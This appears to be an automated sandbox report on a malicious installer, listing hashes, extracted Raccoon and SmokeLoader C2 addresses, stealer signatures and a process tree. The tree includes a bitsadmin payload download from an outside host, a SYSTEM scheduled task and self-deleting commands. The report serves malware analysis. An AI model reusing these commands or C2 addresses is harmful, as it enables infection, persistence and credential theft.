Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1777s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • TelegramRat 1 IoCs

    Telegram_rat.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 50 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2852
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2836
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2756
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2608
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2576
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1908
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1428
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1376
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1180
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1096
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:68
                          • C:\Users\Admin\AppData\Roaming\hujcesa
                            C:\Users\Admin\AppData\Roaming\hujcesa
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2476
                            • C:\Users\Admin\AppData\Roaming\hujcesa
                              C:\Users\Admin\AppData\Roaming\hujcesa
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:4564
                          • C:\Users\Admin\AppData\Roaming\hujcesa
                            C:\Users\Admin\AppData\Roaming\hujcesa
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2232
                            • C:\Users\Admin\AppData\Roaming\hujcesa
                              C:\Users\Admin\AppData\Roaming\hujcesa
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:5760
                          • C:\Users\Admin\AppData\Roaming\hujcesa
                            C:\Users\Admin\AppData\Roaming\hujcesa
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5380
                            • C:\Users\Admin\AppData\Roaming\hujcesa
                              C:\Users\Admin\AppData\Roaming\hujcesa
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:2192
                          • C:\Windows\system32\rundll32.exe
                            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                            2⤵
                            • Windows security modification
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:6012
                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:800
                          • C:\Users\Admin\AppData\Local\Temp\is-30SH4.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-30SH4.tmp\Install.tmp" /SL5="$9006A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3740
                            • C:\Users\Admin\AppData\Local\Temp\is-R0UNB.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-R0UNB.tmp\Ultra.exe" /S /UID=burnerch1
                              3⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Program Files directory
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:3384
                              • C:\Program Files\Windows Media Player\EHXPHCVLSY\ultramediaburner.exe
                                "C:\Program Files\Windows Media Player\EHXPHCVLSY\ultramediaburner.exe" /VERYSILENT
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3424
                                • C:\Users\Admin\AppData\Local\Temp\is-A47L6.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-A47L6.tmp\ultramediaburner.tmp" /SL5="$40056,281924,62464,C:\Program Files\Windows Media Player\EHXPHCVLSY\ultramediaburner.exe" /VERYSILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:904
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    6⤵
                                    • Executes dropped EXE
                                    PID:1992
                              • C:\Users\Admin\AppData\Local\Temp\05-55392-8ba-923ba-ed012ffbaa0bc\Huqiwirowo.exe
                                "C:\Users\Admin\AppData\Local\Temp\05-55392-8ba-923ba-ed012ffbaa0bc\Huqiwirowo.exe"
                                4⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Modifies system certificate store
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3824
                              • C:\Users\Admin\AppData\Local\Temp\be-0ffbb-7d2-63daf-887f1603039b5\Buzheqeveqa.exe
                                "C:\Users\Admin\AppData\Local\Temp\be-0ffbb-7d2-63daf-887f1603039b5\Buzheqeveqa.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2540
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmr1fo5w.xhf\KiffMainE1.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2076
                                  • C:\Users\Admin\AppData\Local\Temp\bmr1fo5w.xhf\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\bmr1fo5w.xhf\KiffMainE1.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4272
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tx3egxlx.joe\001.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4404
                                  • C:\Users\Admin\AppData\Local\Temp\tx3egxlx.joe\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\tx3egxlx.joe\001.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4612
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3e04mgk5.dgr\installer.exe /qn CAMPAIGN="654" & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4572
                                  • C:\Users\Admin\AppData\Local\Temp\3e04mgk5.dgr\installer.exe
                                    C:\Users\Admin\AppData\Local\Temp\3e04mgk5.dgr\installer.exe /qn CAMPAIGN="654"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Enumerates connected drives
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:4776
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3e04mgk5.dgr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3e04mgk5.dgr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037967 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                      7⤵
                                        PID:4624
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t1zurn4s.4un\gpooe.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5064
                                    • C:\Users\Admin\AppData\Local\Temp\t1zurn4s.4un\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\t1zurn4s.4un\gpooe.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of WriteProcessMemory
                                      PID:1868
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:3032
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4868
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4772
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5584
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2nluevs.km4\google-game.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4124
                                      • C:\Users\Admin\AppData\Local\Temp\r2nluevs.km4\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\r2nluevs.km4\google-game.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        • Suspicious use of WriteProcessMemory
                                        PID:4564
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                          7⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:4528
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vmdpxp1.tod\huesaa.exe & exit
                                      5⤵
                                        PID:5172
                                        • C:\Users\Admin\AppData\Local\Temp\3vmdpxp1.tod\huesaa.exe
                                          C:\Users\Admin\AppData\Local\Temp\3vmdpxp1.tod\huesaa.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5728
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5876
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5568
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:6124
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4264
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g304c4bm.ysr\askinstall39.exe & exit
                                        5⤵
                                          PID:5628
                                          • C:\Users\Admin\AppData\Local\Temp\g304c4bm.ysr\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\g304c4bm.ysr\askinstall39.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5820
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              7⤵
                                                PID:4836
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:2644
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\voamp1ed.hhn\setup.exe & exit
                                            5⤵
                                              PID:5912
                                              • C:\Users\Admin\AppData\Local\Temp\voamp1ed.hhn\setup.exe
                                                C:\Users\Admin\AppData\Local\Temp\voamp1ed.hhn\setup.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:5996
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\voamp1ed.hhn\setup.exe"
                                                  7⤵
                                                    PID:4204
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 1.1.1.1 -n 1 -w 3000
                                                      8⤵
                                                      • Runs ping.exe
                                                      PID:5204
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nct534zr.nmy\y1.exe & exit
                                                5⤵
                                                  PID:6108
                                                  • C:\Users\Admin\AppData\Local\Temp\nct534zr.nmy\y1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\nct534zr.nmy\y1.exe
                                                    6⤵
                                                      PID:5292
                                                      • C:\Users\Admin\AppData\Local\Temp\sie83j07di.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\sie83j07di.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Modifies system certificate store
                                                        PID:5624
                                                        • C:\Users\Admin\AppData\Roaming\1620297341350.exe
                                                          "C:\Users\Admin\AppData\Roaming\1620297341350.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297341350.txt"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5164
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\sie83j07di.exe"
                                                          8⤵
                                                            PID:6004
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 3
                                                              9⤵
                                                              • Runs ping.exe
                                                              PID:4876
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nct534zr.nmy\y1.exe"
                                                          7⤵
                                                            PID:4484
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /T 10 /NOBREAK
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:2476
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjn1rxa1.1z2\Setup_v3.exe & exit
                                                        5⤵
                                                          PID:5440
                                                          • C:\Users\Admin\AppData\Local\Temp\rjn1rxa1.1z2\Setup_v3.exe
                                                            C:\Users\Admin\AppData\Local\Temp\rjn1rxa1.1z2\Setup_v3.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5576
                                                            • C:\Windows\SysWOW64\at.exe
                                                              "C:\Windows\System32\at.exe"
                                                              7⤵
                                                                PID:5420
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                7⤵
                                                                  PID:5076
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\System32\cmd.exe
                                                                    8⤵
                                                                      PID:6104
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                        9⤵
                                                                          PID:4948
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                          Fessura.exe.com Z
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:5740
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:5408
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                              11⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:5968
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                12⤵
                                                                                  PID:4484
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                PID:5564
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                PID:5524
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            9⤵
                                                                            • Runs ping.exe
                                                                            PID:4104
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        7⤵
                                                                          PID:5816
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ta2bzncc.rkb\toolspab1.exe & exit
                                                                      5⤵
                                                                        PID:5624
                                                                        • C:\Users\Admin\AppData\Local\Temp\ta2bzncc.rkb\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\ta2bzncc.rkb\toolspab1.exe
                                                                          6⤵
                                                                            PID:5920
                                                                            • C:\Users\Admin\AppData\Local\Temp\ta2bzncc.rkb\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\ta2bzncc.rkb\toolspab1.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6020
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elys1ukm.l5z\005.exe & exit
                                                                          5⤵
                                                                            PID:5296
                                                                            • C:\Users\Admin\AppData\Local\Temp\elys1ukm.l5z\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\elys1ukm.l5z\005.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:6024
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dl2bzfdp.rom\SunLabsPlayer.exe /S & exit
                                                                            5⤵
                                                                              PID:6060
                                                                              • C:\Users\Admin\AppData\Local\Temp\dl2bzfdp.rom\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\dl2bzfdp.rom\SunLabsPlayer.exe /S
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:6088
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5420
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4432
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:6032
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:3508
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:2228
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:416
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                              • Checks for any installed AV software in registry
                                                                                              PID:4908
                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                              7⤵
                                                                                              • Download via BitsAdmin
                                                                                              PID:4888
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4988
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4608
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:4392
